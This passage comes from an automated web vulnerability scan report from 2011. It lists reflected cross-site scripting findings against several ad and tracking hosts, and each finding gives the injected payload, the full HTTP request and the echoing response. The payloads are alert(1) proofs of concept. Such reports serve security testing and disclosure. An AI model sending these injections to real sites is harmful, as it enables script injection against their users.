var rsi_csid= 'A10868';if(typeof(csids)=="undefined"){var csids=[rsi_csid];}else{csids.push(rsi_csid);};function rsiClient(Da
...[SNIP]...
e rsi_r();
A10868.DM_addEncToLoc('ver', '2.2');
A10868.DM_addEncToLoc('clen','328');
A10868.DM_addEncToLoc('vid', '27200');
A10868.DM_addEncToLoc('pid', '261950');
A10868.DM_addEncToLoc('pli', '344914661d4e';alert(1)//bb7df706fb4');
A10868.DM_addEncToLoc('sid', '2298003');
A10868.DM_addEncToLoc('ali', '3329023');
A10868.DM_addEncToLoc('cid', '10288627');
A10868.DM_addEncToLoc('p', '99');
A10868.DM_addEncToLoc('ref', 'http://
...[SNIP]...
|
4.128. http://js.revsci.net/gateway/gw.js [ref parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://js.revsci.net |
| Path: |
/gateway/gw.js |
Issue detail
The value of the ref request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ce66b'%3balert(1)//a655a638949 was submitted in the ref parameter. This input was echoed as ce66b';alert(1)//a655a638949 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /gateway/gw.js?auto=t&csid=A10868&ver=2.2&clen=328&vid=27200&pid=261950&pli=3449146&sid=2298003&ali=3329023&cid=10288627&p=99&ref=http%3A//www.tmz.com/ce66b'%3balert(1)//a655a638949& HTTP/1.1
Host: js.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=optout
|
Response
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Sat, 17 Sep 2011 00:52:53 GMT
Cache-Control: max-age=86400, private
Expires: Sun, 18 Sep 2011 00:52:53 GMT
X-Proc-ms: 1
Content-Type: application/javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 00:52:52 GMT
Content-Length: 5218
//AG-develop 12.7.1-110 (2011-08-15 17:17:21 UTC)
var rsi_now= new Date();
var rsi_csid= 'A10868';if(typeof(csids)=="undefined"){var csids=[rsi_csid];}else{csids.push(rsi_csid);};function rsiClient(Da
...[SNIP]...
M_addEncToLoc('sid', '2298003');
A10868.DM_addEncToLoc('ali', '3329023');
A10868.DM_addEncToLoc('cid', '10288627');
A10868.DM_addEncToLoc('p', '99');
A10868.DM_addEncToLoc('ref', 'http://www.tmz.com/ce66b';alert(1)//a655a638949');
if(window[rsi_csid])window[rsi_csid].DM_tag();else DM_tag();
|
4.129. http://js.revsci.net/gateway/gw.js [sid parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://js.revsci.net |
| Path: |
/gateway/gw.js |
Issue detail
The value of the sid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fbb14'%3balert(1)//5c7df914983 was submitted in the sid parameter. This input was echoed as fbb14';alert(1)//5c7df914983 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /gateway/gw.js?auto=t&csid=A10868&ver=2.2&clen=328&vid=27200&pid=261950&pli=3449146&sid=2298003fbb14'%3balert(1)//5c7df914983&ali=3329023&cid=10288627&p=99&ref=http%3A//www.tmz.com/& HTTP/1.1
Host: js.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=optout
|
Response
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Sat, 17 Sep 2011 00:52:45 GMT
Cache-Control: max-age=86400, private
Expires: Sun, 18 Sep 2011 00:52:45 GMT
X-Proc-ms: 0
Content-Type: application/javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 00:52:44 GMT
Content-Length: 5218
//AG-develop 12.7.1-110 (2011-08-15 17:17:21 UTC)
var rsi_now= new Date();
var rsi_csid= 'A10868';if(typeof(csids)=="undefined"){var csids=[rsi_csid];}else{csids.push(rsi_csid);};function rsiClient(Da
...[SNIP]...
2.2');
A10868.DM_addEncToLoc('clen','328');
A10868.DM_addEncToLoc('vid', '27200');
A10868.DM_addEncToLoc('pid', '261950');
A10868.DM_addEncToLoc('pli', '3449146');
A10868.DM_addEncToLoc('sid', '2298003fbb14';alert(1)//5c7df914983');
A10868.DM_addEncToLoc('ali', '3329023');
A10868.DM_addEncToLoc('cid', '10288627');
A10868.DM_addEncToLoc('p', '99');
A10868.DM_addEncToLoc('ref', 'http://www.tmz.com/');
if(window[rsi_csid])windo
...[SNIP]...
|
4.130. http://js.revsci.net/gateway/gw.js [ver parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://js.revsci.net |
| Path: |
/gateway/gw.js |
Issue detail
The value of the ver request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 31763'%3balert(1)//9a116341702 was submitted in the ver parameter. This input was echoed as 31763';alert(1)//9a116341702 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /gateway/gw.js?auto=t&csid=A10868&ver=2.231763'%3balert(1)//9a116341702&clen=328&vid=27200&pid=261950&pli=3449146&sid=2298003&ali=3329023&cid=10288627&p=99&ref=http%3A//www.tmz.com/& HTTP/1.1
Host: js.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=optout
|
Response
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Sat, 17 Sep 2011 00:52:32 GMT
Cache-Control: max-age=86400, private
Expires: Sun, 18 Sep 2011 00:52:32 GMT
X-Proc-ms: 0
Content-Type: application/javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 00:52:31 GMT
Content-Length: 5218
//AG-develop 12.7.1-110 (2011-08-15 17:17:21 UTC)
var rsi_now= new Date();
var rsi_csid= 'A10868';if(typeof(csids)=="undefined"){var csids=[rsi_csid];}else{csids.push(rsi_csid);};function rsiClient(Da
...[SNIP]...
;}window[rsi_csid]=new rsiClient(rsi_csid);
if(window[rsi_csid])window[rsi_csid].rsi_ral(1);else rsi_ral(1);
if(window[rsi_csid])window[rsi_csid].rsi_r();else rsi_r();
A10868.DM_addEncToLoc('ver', '2.231763';alert(1)//9a116341702');
A10868.DM_addEncToLoc('clen','328');
A10868.DM_addEncToLoc('vid', '27200');
A10868.DM_addEncToLoc('pid', '261950');
A10868.DM_addEncToLoc('pli', '3449146');
A10868.DM_addEncToLoc('sid', '2298003');
...[SNIP]...
|
4.131. http://js.revsci.net/gateway/gw.js [vid parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://js.revsci.net |
| Path: |
/gateway/gw.js |
Issue detail
The value of the vid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 69e1a'%3balert(1)//d8a16318306 was submitted in the vid parameter. This input was echoed as 69e1a';alert(1)//d8a16318306 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /gateway/gw.js?auto=t&csid=A10868&ver=2.2&clen=328&vid=2720069e1a'%3balert(1)//d8a16318306&pid=261950&pli=3449146&sid=2298003&ali=3329023&cid=10288627&p=99&ref=http%3A//www.tmz.com/& HTTP/1.1
Host: js.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=optout
|
Response
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Sat, 17 Sep 2011 00:52:40 GMT
Cache-Control: max-age=86400, private
Expires: Sun, 18 Sep 2011 00:52:40 GMT
X-Proc-ms: 0
Content-Type: application/javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 00:52:39 GMT
Content-Length: 5218
//AG-develop 12.7.1-110 (2011-08-15 17:17:21 UTC)
var rsi_now= new Date();
var rsi_csid= 'A10868';if(typeof(csids)=="undefined"){var csids=[rsi_csid];}else{csids.push(rsi_csid);};function rsiClient(Da
...[SNIP]...
sid].rsi_ral(1);else rsi_ral(1);
if(window[rsi_csid])window[rsi_csid].rsi_r();else rsi_r();
A10868.DM_addEncToLoc('ver', '2.2');
A10868.DM_addEncToLoc('clen','328');
A10868.DM_addEncToLoc('vid', '2720069e1a';alert(1)//d8a16318306');
A10868.DM_addEncToLoc('pid', '261950');
A10868.DM_addEncToLoc('pli', '3449146');
A10868.DM_addEncToLoc('sid', '2298003');
A10868.DM_addEncToLoc('ali', '3329023');
A10868.DM_addEncToLoc('cid', '1028
...[SNIP]...
|
4.132. http://livechat.iadvize.com/rpc/referrer.php [get parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://livechat.iadvize.com |
| Path: |
/rpc/referrer.php |
Issue detail
The value of the get request parameter is copied into the HTML document as plain text between tags. The payload 276c3<script>alert(1)</script>2f89cc1f134 was submitted in the get parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /rpc/referrer.php?s=1821&get=276c3<script>alert(1)</script>2f89cc1f134&random=1316228161329 HTTP/1.1
Host: livechat.iadvize.com
Proxy-Connection: keep-alive
Referer: http://www.mailjet.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: vuid=fc0d3bf4f99e190aeffd3c6b449e3ce04e736ab952c62; 1821vvc=3; 1821_idzp=%7B%22site_id%22%3A1821%2C%22chatcount%22%3A0%2C%22nbrVisite%22%3A2%2C%22country%22%3Anull%2C%22country_name%22%3A%22%22%2C%22city%22%3A%22%22%2C%22lat%22%3Anull%2C%22long%22%3Anull%2C%22lang%22%3A%22en%22%2C%22visitorname%22%3A%22+%22%2C%22extID%22%3Anull%2C%22pageview%22%3A1%2C%22connectionTime%22%3A1316210078%2C%22navTime%22%3A1000%7D; 1821_idz=XnclJ01Pg6id2FcJU13kUkMfaXVNV%2F8gxkjQn8hBPcG6LNaooz40h%2BMaW0hQlsjGSRD%2BkhBEQXtHEo8uNUWZDoUCReT5yO90BLxF%2FLlYyUr51FG%2FyyfLpChY7rUtOwVCw8l%2Fg3u5V7ZarDSzVOiKi6RLcJ2O
|
Response
HTTP/1.1 200 OK
Server: nginx/0.6.32
Date: Fri, 16 Sep 2011 21:55:15 GMT
Content-Type: text/javascript; charset=utf-8
Connection: keep-alive
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache
Pragma: no-cache
P3P: policyref="http://livechat.iadvize.com/w3c/p3p.xml", CP="NID DSP NON COR"
Set-Cookie: 1821_idzp=%7B%22site_id%22%3A1821%2C%22lang%22%3A%22en%22%2C%22pageview%22%3A3%2C%22referrer_lastPage%22%3A%22http%3A%5C%2F%5C%2Fwww.mailjet.com%5C%2Ffeatures%22%2C%22timeElapsed%22%3A21936835.17%2C%22navTime%22%3A1316210110000%2C%22origin_site%22%3A%22276c3%3Cscript%3Ealert%281%29%3C%5C%2Fscript%3E2f89cc1f134%22%2C%22origin%22%3A%22website%22%2C%22refengine%22%3A%22%22%2C%22refkeyword%22%3A%22%22%7D; path=/
Vary: Accept-Encoding
Content-Length: 215
iAdvize.vStats['origin_site'] = '276c3<script>alert(1)</script>2f89cc1f134';iAdvize.vStats['origin'] = 'website';iAdvize.vStats['refengine'] = '';iAdvize.vStats['refkeyword'] = '';iAdvize.util.delScript('referrer'); |
4.133. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/auditude_entertainment_video/preroll/vast/sx/ss/a/@x75 [REST URL parameter 10]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://network.realmedia.com |
| Path: |
/RealMedia/ads/adstream_sx.ads/auditude_entertainment_video/preroll/vast/sx/ss/a/@x75 |
Issue detail
The value of REST URL parameter 10 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 35aa8"><script>alert(1)</script>e320abbb45e was submitted in the REST URL parameter 10. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /RealMedia/ads/adstream_sx.ads/auditude_entertainment_video/preroll/vast/sx/ss/a/@x7535aa8"><script>alert(1)</script>e320abbb45e HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://adunit.cdn.auditude.com/flash/modules/display/AuditudeDisplayView.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RMOPTOUT=3
|
Response
HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:13:58 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 366
Content-Type: text/html
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09499e0f45525d5f4f58455e445a4a423660;expires=Sat, 17-Sep-2011 01:14:58 GMT;path=/;httponly
<A HREF="http://network.realmedia.com/RealMedia/ads/click_lx.ads/auditude_entertainment_video/preroll/vast/sx/ss/a/256834064/x7535aa8"><script>alert(1)</script>e320abbb45e/default/empty.gif/4d686437616b357a3837594141787878?" target="_top">
...[SNIP]...
|
4.134. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/auditude_entertainment_video/preroll/vast/sx/ss/a/@x75 [REST URL parameter 4]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://network.realmedia.com |
| Path: |
/RealMedia/ads/adstream_sx.ads/auditude_entertainment_video/preroll/vast/sx/ss/a/@x75 |
Issue detail
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d379f"><script>alert(1)</script>cdd4cac9c4c was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /RealMedia/ads/adstream_sx.ads/auditude_entertainment_videod379f"><script>alert(1)</script>cdd4cac9c4c/preroll/vast/sx/ss/a/@x75 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://adunit.cdn.auditude.com/flash/modules/display/AuditudeDisplayView.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RMOPTOUT=3
|
Response
HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:12:42 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 375
Content-Type: text/html
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09499e0f45525d5f4f58455e445a4a423660;expires=Sat, 17-Sep-2011 01:13:42 GMT;path=/;httponly
<A HREF="http://network.realmedia.com/RealMedia/ads/click_lx.ads/auditude_entertainment_videod379f"><script>alert(1)</script>cdd4cac9c4c/preroll/vast/sx/ss/a/1859115549/x75/default/empty.gif/4d686437616b357a3837594141787878?" target="_top">
...[SNIP]...
|
4.135. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/auditude_news_video/preroll/vast/sx/ss/a/@x75 [REST URL parameter 10]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://network.realmedia.com |
| Path: |
/RealMedia/ads/adstream_sx.ads/auditude_news_video/preroll/vast/sx/ss/a/@x75 |
Issue detail
The value of REST URL parameter 10 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7095e"><script>alert(1)</script>372b13aff79 was submitted in the REST URL parameter 10. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /RealMedia/ads/adstream_sx.ads/auditude_news_video/preroll/vast/sx/ss/a/@x757095e"><script>alert(1)</script>372b13aff79 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://adunit.cdn.auditude.com/flash/modules/display/AuditudeDisplayView.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RMOPTOUT=3
|
Response
HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:13:57 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 358
Content-Type: text/html
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09499e0f45525d5f4f58455e445a4a423660;expires=Sat, 17-Sep-2011 01:14:57 GMT;path=/;httponly
<A HREF="http://network.realmedia.com/RealMedia/ads/click_lx.ads/auditude_news_video/preroll/vast/sx/ss/a/2010045325/x757095e"><script>alert(1)</script>372b13aff79/default/empty.gif/4d686437616b357a3837594141787878?" target="_top">
...[SNIP]...
|
4.136. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/auditude_news_video/preroll/vast/sx/ss/a/@x75 [REST URL parameter 4]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://network.realmedia.com |
| Path: |
/RealMedia/ads/adstream_sx.ads/auditude_news_video/preroll/vast/sx/ss/a/@x75 |
Issue detail
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f2129"><script>alert(1)</script>3d7659e830d was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /RealMedia/ads/adstream_sx.ads/auditude_news_videof2129"><script>alert(1)</script>3d7659e830d/preroll/vast/sx/ss/a/@x75 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://adunit.cdn.auditude.com/flash/modules/display/AuditudeDisplayView.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RMOPTOUT=3
|
Response
HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:12:43 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 364
Content-Type: text/html
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09499e0f45525d5f4f58455e445a4a423660;expires=Sat, 17-Sep-2011 01:13:43 GMT;path=/;httponly
<A HREF="http://network.realmedia.com/RealMedia/ads/click_lx.ads/auditude_news_videof2129"><script>alert(1)</script>3d7659e830d/preroll/vast/sx/ss/a/92301275/x75/default/empty.gif/4d686437616b357a3837594141787878?" target="_top">
...[SNIP]...
|
4.137. http://oascentral.bostonherald.com/RealMedia/ads/adstream_sx.ads/bh.heraldinteractive.com/video/129334548@x91 [REST URL parameter 4]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://oascentral.bostonherald.com |
| Path: |
/RealMedia/ads/adstream_sx.ads/bh.heraldinteractive.com/video/129334548@x91 |
Issue detail
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c158e"><script>alert(1)</script>74eb6653c9a was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /RealMedia/ads/adstream_sx.ads/bh.heraldinteractive.comc158e"><script>alert(1)</script>74eb6653c9a/video/129334548@x91 HTTP/1.1
Host: oascentral.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://c.brightcove.com/services/viewer/federated_f9?isVid=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=Mhd7ak5wnrsADfhS; __qca=P0-565564501-1316021626456; NSC_d12efm_qppm_iuuq=ffffffff09499e4145525d5f4f58455e445a4a423660; RMFD=011R4jGHO201yed8|O2021J3t|O3021J78|O2021J7A|O2021J7F|O10226KY|O20226Kk; __utma=235728274.611537932.1316021623.1316021623.1316239291.2; __utmb=235728274.35.10.1316239294; __utmc=235728274; __utmz=235728274.1316021623.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
|
Response
HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:52:54 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
ntCoent-Length: 363
Content-Type: text/html
Cache-Control: private
Content-Length: 363
<A HREF="http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.comc158e"><script>alert(1)</script>74eb6653c9a/video/1085717019/x91/default/empty.gif/4d686437616b357a2f4b554143616d4f?x" target="_top">
...[SNIP]...
|
4.138. http://oascentral.bostonherald.com/RealMedia/ads/adstream_sx.ads/bh.heraldinteractive.com/video/129334548@x91 [REST URL parameter 5]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://oascentral.bostonherald.com |
| Path: |
/RealMedia/ads/adstream_sx.ads/bh.heraldinteractive.com/video/129334548@x91 |
Issue detail
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b6438"><script>alert(1)</script>21e8c03b3a3 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /RealMedia/ads/adstream_sx.ads/bh.heraldinteractive.com/videob6438"><script>alert(1)</script>21e8c03b3a3/129334548@x91 HTTP/1.1
Host: oascentral.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://c.brightcove.com/services/viewer/federated_f9?isVid=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=Mhd7ak5wnrsADfhS; __qca=P0-565564501-1316021626456; NSC_d12efm_qppm_iuuq=ffffffff09499e4145525d5f4f58455e445a4a423660; RMFD=011R4jGHO201yed8|O2021J3t|O3021J78|O2021J7A|O2021J7F|O10226KY|O20226Kk; __utma=235728274.611537932.1316021623.1316021623.1316239291.2; __utmb=235728274.35.10.1316239294; __utmc=235728274; __utmz=235728274.1316021623.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
|
Response
HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:53:12 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
ntCoent-Length: 363
Content-Type: text/html
Cache-Control: private
Content-Length: 363
<A HREF="http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/videob6438"><script>alert(1)</script>21e8c03b3a3/1734057116/x91/default/empty.gif/4d686437616b357a2f4b554143616d4f?x" target="_top">
...[SNIP]...
|
4.139. http://oascentral.bostonherald.com/RealMedia/ads/adstream_sx.ads/bh.heraldinteractive.com/video/129334548@x91 [REST URL parameter 6]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://oascentral.bostonherald.com |
| Path: |
/RealMedia/ads/adstream_sx.ads/bh.heraldinteractive.com/video/129334548@x91 |
Issue detail
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f12c6"><script>alert(1)</script>11ed6697784 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /RealMedia/ads/adstream_sx.ads/bh.heraldinteractive.com/video/129334548@x91f12c6"><script>alert(1)</script>11ed6697784 HTTP/1.1
Host: oascentral.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://c.brightcove.com/services/viewer/federated_f9?isVid=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=Mhd7ak5wnrsADfhS; __qca=P0-565564501-1316021626456; NSC_d12efm_qppm_iuuq=ffffffff09499e4145525d5f4f58455e445a4a423660; RMFD=011R4jGHO201yed8|O2021J3t|O3021J78|O2021J7A|O2021J7F|O10226KY|O20226Kk; __utma=235728274.611537932.1316021623.1316021623.1316239291.2; __utmb=235728274.35.10.1316239294; __utmc=235728274; __utmz=235728274.1316021623.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
|
Response
HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:53:31 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
ntCoent-Length: 354
Content-Type: text/html
Cache-Control: private
Content-Length: 354
<A HREF="http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/video/533636951/x91f12c6"><script>alert(1)</script>11ed6697784/default/empty.gif/4d686437616b357a2f4b554143616d4f?x" target="_top">
...[SNIP]...
|
4.140. http://pglb.buzzfed.com/63857/8b52baa86e5b07ac085974feb13e2090 [callback parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://pglb.buzzfed.com |
| Path: |
/63857/8b52baa86e5b07ac085974feb13e2090 |
Issue detail
The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 6767c<script>alert(1)</script>579e3c6c8aa was submitted in the callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /63857/8b52baa86e5b07ac085974feb13e2090?callback=BF_PARTNER.gate_response6767c<script>alert(1)</script>579e3c6c8aa&cb=8827 HTTP/1.1
Host: pglb.buzzfed.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
|
Response
HTTP/1.1 200 OK
Content-Type: text/javascript; charset=ISO-8859-1
Server: lighttpd
Content-Length: 79
Cache-Control: max-age=604800
Expires: Sat, 24 Sep 2011 00:58:05 GMT
Date: Sat, 17 Sep 2011 00:58:05 GMT
Connection: close
